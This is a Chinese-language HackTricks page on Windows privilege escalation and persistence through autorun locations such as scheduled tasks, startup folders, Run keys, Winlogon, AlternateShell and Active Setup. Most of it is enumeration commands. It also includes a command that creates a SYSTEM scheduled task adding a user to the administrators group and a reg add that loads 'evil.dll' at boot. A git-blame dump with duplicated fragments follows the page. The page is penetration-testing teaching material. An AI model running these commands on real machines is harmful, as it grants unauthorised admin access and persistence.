hacktricks/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md

# 使用 Autoruns 进行权限提升

<details>

<summary><strong>从零开始学习 AWS 黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS 红队专家）</strong></a><strong>！</strong></summary>

支持 HackTricks 的其他方式：

- 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上 **关注**我们。
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。

</details>

<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**漏洞赏金提示**：**注册** Intigriti，这是一家由黑客创建的高级**漏洞赏金平台**！立即加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达**$100,000**的赏金！

{% embed url="https://go.intigriti.com/hacktricks" %}

## WMIC

**Wmic** 可用于在**启动**时运行程序。查看在启动时编程运行的二进制文件：
```bash
wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
```
## 计划任务

**任务**可以按照**特定频率**进行调度运行。查看已安排运行的二进制文件：
```bash
schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

#Schtask to give admin access
#You can also write that content on a bat file that is being executed by a scheduled task
schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
```
## 文件夹

**启动文件夹中的所有二进制文件将在启动时执行**。常见的启动文件夹如下所示，但启动文件夹在注册表中有指示。[阅读此处以了解位置。](privilege-escalation-with-autorun-binaries.md#startup-path)
```bash
dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
```
## 注册表

{% hint style="info" %}
[从这里注释](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** 注册表项表示您正在运行 64 位 Windows 版本。操作系统使用此键为在 64 位 Windows 版本上运行的 32 位应用程序显示 HKEY_LOCAL_MACHINE\SOFTWARE 的单独视图。
{% endhint %}

### 运行

**常见的** AutoRun 注册表:

* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce`
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx`

被称为 **Run** 和 **RunOnce** 的注册表键旨在每次用户登录系统时自动执行程序。作为键数据值分配的命令行限制为 260 个字符或更少。

**服务运行** (可以控制系统启动时服务的自动启动):

* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices`
* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices`
* `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices`

**RunOnceEx:**

* `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`
* `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx`

在 Windows Vista 及更高版本中，**Run** 和 **RunOnce** 注册表键不会自动生成。这些键中的条目可以直接启动程序或将它们指定为依赖项。例如，要在登录时加载 DLL 文件，可以使用 **RunOnceEx** 注册表键以及一个 "Depend" 键。通过添加一个注册表项来在系统启动时执行 "C:\temp\evil.dll" 来演示这一点:
```
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
```
{% hint style="info" %}
**Exploit 1**：如果您可以在**HKLM**中的任何提到的注册表中写入内容，则可以在不同用户登录时提升权限。
{% endhint %}

{% hint style="info" %}
**Exploit 2**：如果您可以覆盖**HKLM**中任何注册表中指定的任何二进制文件，则可以在不同用户登录时修改该二进制文件并提升权限。
{% endhint %}
```bash
#CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices

reg query HKLM\Software\Microsoft\Windows\RunOnceEx
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx

#PowerShell
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'

Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'

Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
```
### 启动路径

* `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`

放置在**启动**文件夹中的快捷方式将在用户登录或系统重新启动期间自动触发服务或应用程序的启动。**启动**文件夹的位置在注册表中为**本地计算机**和**当前用户**范围定义。这意味着添加到这些指定**启动**位置的任何快捷方式都将确保链接的服务或程序在登录或重新启动过程后启动，这是一种安排程序自动运行的简单方法。

{% hint style="info" %}
如果您可以覆盖**HKLM**下的任何\[User] Shell Folder，您将能够将其指向您控制的文件夹，并放置一个后门，每当用户登录系统时都会执行，从而提升权限。
{% endhint %}
```bash
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"

Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
```
### Winlogon Keys

`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`

通常，**Userinit** 键被设置为 **userinit.exe**。但是，如果修改了此键，则指定的可执行文件也将由 **Winlogon** 在用户登录时启动。同样，**Shell** 键旨在指向 **explorer.exe**，这是 Windows 的默认 shell。
```bash
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
```
{% hint style="info" %}
如果您可以覆盖注册表值或二进制文件，则可以提升权限。
{% endhint %}

### 策略设置

* `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`

检查 **Run** 键。
```bash
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
```
### AlternateShell

### 更改安全模式命令提示符

在Windows注册表中的 `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot` 下，默认设置了一个名为 **`AlternateShell`** 的数值，其数值为 `cmd.exe`。这意味着当您在启动时选择“带命令提示符的安全模式”（按 F8 键），将使用 `cmd.exe`。但是，可以设置计算机自动启动到此模式，而无需按 F8 并手动选择它。

创建一个用于自动启动“带命令提示符的安全模式”的引导选项的步骤：

1. 更改 `boot.ini` 文件的属性，以移除只读、系统和隐藏标志：`attrib c:\boot.ini -r -s -h`
2. 打开 `boot.ini` 进行编辑。
3. 插入一行类似于：`multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
4. 保存更改到 `boot.ini`。
5. 重新应用原始文件属性：`attrib c:\boot.ini +r +s +h`

* **Exploit 1:** 更改 **AlternateShell** 注册表键允许设置自定义命令 shell，可能用于未经授权的访问。
* **Exploit 2 (PATH 写入权限):** 对系统 **PATH** 变量的任何部分具有写入权限，特别是在 `C:\Windows\system32` 之前，可以执行自定义的 `cmd.exe`，如果系统在安全模式下启动，则可能成为后门。
* **Exploit 3 (PATH 和 boot.ini 写入权限):** 对 `boot.ini` 的写入访问权限使安全模式自动启动，从而在下次重启时促进未经授权的访问。

要检查当前的 **AlternateShell** 设置，请使用以下命令：
```bash
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
```
### 已安装组件

Active Setup 是 Windows 中的一个功能，在桌面环境完全加载之前启动。它优先执行某些命令，这些命令必须在用户登录继续之前完成。这个过程甚至发生在其他启动条目之前，比如在 Run 或 RunOnce 注册表部分触发的条目。

Active Setup 通过以下注册表键进行管理：

- `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components`
- `HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
- `HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components`
- `HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`

在这些键中，存在各种子键，每个对应一个特定的组件。特别感兴趣的键值包括：

- **IsInstalled:**
  - `0` 表示组件的命令不会执行。
  - `1` 表示命令将为每个用户执行一次，这是默认行为，如果缺少 `IsInstalled` 值。
- **StubPath:** 定义由 Active Setup 执行的命令。它可以是任何有效的命令行，比如启动 `notepad`。

**安全洞察:**

- 修改或写入 `IsInstalled` 设置为 `"1"` 的键，具有特定 `StubPath` 的键可能导致未经授权的命令执行，潜在地用于特权升级。
- 修改任何 `StubPath` 值中引用的二进制文件也可能实现特权升级，如果有足够的权限。

要检查 Active Setup 组件中的 `StubPath` 配置，可以使用以下命令：
```bash
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
```
### 浏览器辅助对象

### 浏览器辅助对象（BHOs）概述

浏览器辅助对象（BHOs）是DLL模块，可为微软的Internet Explorer添加额外功能。它们在每次启动时加载到Internet Explorer和Windows Explorer中。然而，通过将**NoExplorer**键设置为1，可以阻止它们在Windows Explorer实例中加载，从而阻止它们执行。

BHOs通过Internet Explorer 11与Windows 10兼容，但不支持Microsoft Edge，这是较新版本Windows中的默认浏览器。

要查看系统上注册的BHOs，可以检查以下注册表键：

- `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
- `HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`

每个BHO在注册表中由其**CLSID**表示，作为唯一标识符。有关每个CLSID的详细信息可以在`HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`下找到。

要查询注册表中的BHOs，可以使用以下命令：
```bash
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
```
### Internet Explorer Extensions

* `HKLM\Software\Microsoft\Internet Explorer\Extensions`
* `HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions`

请注意，注册表中将包含每个dll的1个新注册表，并且将由 **CLSID** 表示。您可以在 `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}` 中找到 CLSID 信息。

### Font Drivers

* `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers`
* `HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers`
```bash
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'
```
### 打开命令

* `HKLM\SOFTWARE\Classes\htmlfile\shell\open\command`
* `HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command`
```bash
reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
```
### 图像文件执行选项
```
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
```
## SysInternals

请注意，您可以找到自动运行的所有站点都已经被**winpeas.exe**搜索过。但是，为了获得更全面的自动执行文件列表，您可以使用[systinternals的autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)。
```
autorunsc.exe -m -nobanner -a * -ct /accepteula
```
## 更多

**查找更多类似注册表的自动运行程序，请访问** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2)

## 参考资料

* [https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref](https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref)
* [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
* [https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2)
* [https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell](https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell)

<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**漏洞悬赏提示**：**注册** Intigriti，一个由黑客创建的高级**漏洞悬赏平台**！立即加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达**$100,000**的悬赏！

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

支持 HackTricks 的其他方式：

* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。

</details>
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								# 使用 Autoruns 进行权限提升
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								<summary><strong>从零开始学习 AWS 黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS 红队专家）</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:29:36 +00:00
+								支持 HackTricks 的其他方式：
-												Translated ['windows-hardening/active-directory-methodology/README.md',

											
										
										
											2024-01-02 20:35:58 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								- 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
 								- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
 								- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上 **关注**我们。
 								- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								**漏洞赏金提示**：**注册** Intigriti，这是一家由黑客创建的高级**漏洞赏金平台**！立即加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达**$100,000**的赏金！
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								{% embed url="https://go.intigriti.com/hacktricks" %}
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
 								## WMIC
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/README.md', 'forensics

											
										
										
											2024-02-09 01:27:24 +00:00
+								**Wmic** 可用于在**启动**时运行程序。查看在启动时编程运行的二进制文件：
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
+								```bash
 								wmic startup get caption,command 2>nul & ^
 								Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2023-12-26 02:11:12 +00:00
+								## 计划任务
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								**任务**可以按照**特定频率**进行调度运行。查看已安排运行的二进制文件：
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
+								```bash
 								schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
-												GitBook: [master] 360 pages modified
											
										
										
											2020-08-17 14:38:36 +00:00
+								schtasks /query /fo LIST 2>nul | findstr TaskName
 								schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
 								Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
-												GitBook: [master] 380 pages modified
											
										
										
											2020-10-22 16:22:49 +00:00
 								#Schtask to give admin access
 								#You can also write that content on a bat file that is being executed by a scheduled task
 								schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
+								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 文件夹
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								**启动文件夹中的所有二进制文件将在启动时执行**。常见的启动文件夹如下所示，但启动文件夹在注册表中有指示。[阅读此处以了解位置。](privilege-escalation-with-autorun-binaries.md#startup-path)
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
+								```bash
 								dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
 								dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
 								dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
 								dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
 								Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
 								Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 注册表
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								{% hint style="info" %}
-												Translated ['forensics/basic-forensic-methodology/README.md', 'forensics

											
										
										
											2024-02-09 01:27:24 +00:00
+								[从这里注释](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** 注册表项表示您正在运行 64 位 Windows 版本。操作系统使用此键为在 64 位 Windows 版本上运行的 32 位应用程序显示 HKEY_LOCAL_MACHINE\SOFTWARE 的单独视图。
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								{% endhint %}
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 运行
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								**常见的** AutoRun 注册表:
